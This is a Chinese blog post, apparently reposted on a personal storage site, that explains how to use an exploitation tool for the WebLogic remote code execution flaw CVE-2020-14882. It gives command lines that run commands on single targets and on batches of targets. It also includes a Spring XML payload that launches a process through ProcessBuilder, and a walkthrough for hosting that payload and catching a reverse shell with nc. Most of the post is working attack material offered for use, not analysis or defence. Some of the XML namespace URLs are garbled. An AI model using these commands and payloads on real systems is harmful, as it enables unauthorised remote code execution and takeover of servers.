分享

Weblogic远程代码执行-CVE-2020-14882

 昆仑圃 2020-11-04

CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。

需要模块:requests、http.client

功能一:命令回显

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c 'net user'

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c 'whoami'

功能二:批量命令回显

python3 CVE-2020-14882_ALL.py -f target.txt -c 'whoami'

target.txt 格式:http://x.x.x.x:xx,一行一个

功能三:外置xml文件无回显命令执行

1、Linux反弹shell为例,编辑好poc.xml文件,开启python监听。

<beans xmlns='http://www./schema/beans' xmlns:xsi='http://www./2001/XMLSchema-instance' xsi:schemaLocation='http://www./schema/beans http://www./schema/beans/spring-beans.xsd'>  <bean id='pb' class='java.lang.ProcessBuilder' init-method='start'>    <constructor-arg>      <list>  <value>cmd</value>      </list>    </constructor-arg>  </bean></beans>

开启python监听

nc开启监听

2、使用-x选项指定xml文件路径,发送payload。

python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml

3、成功接收shell

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约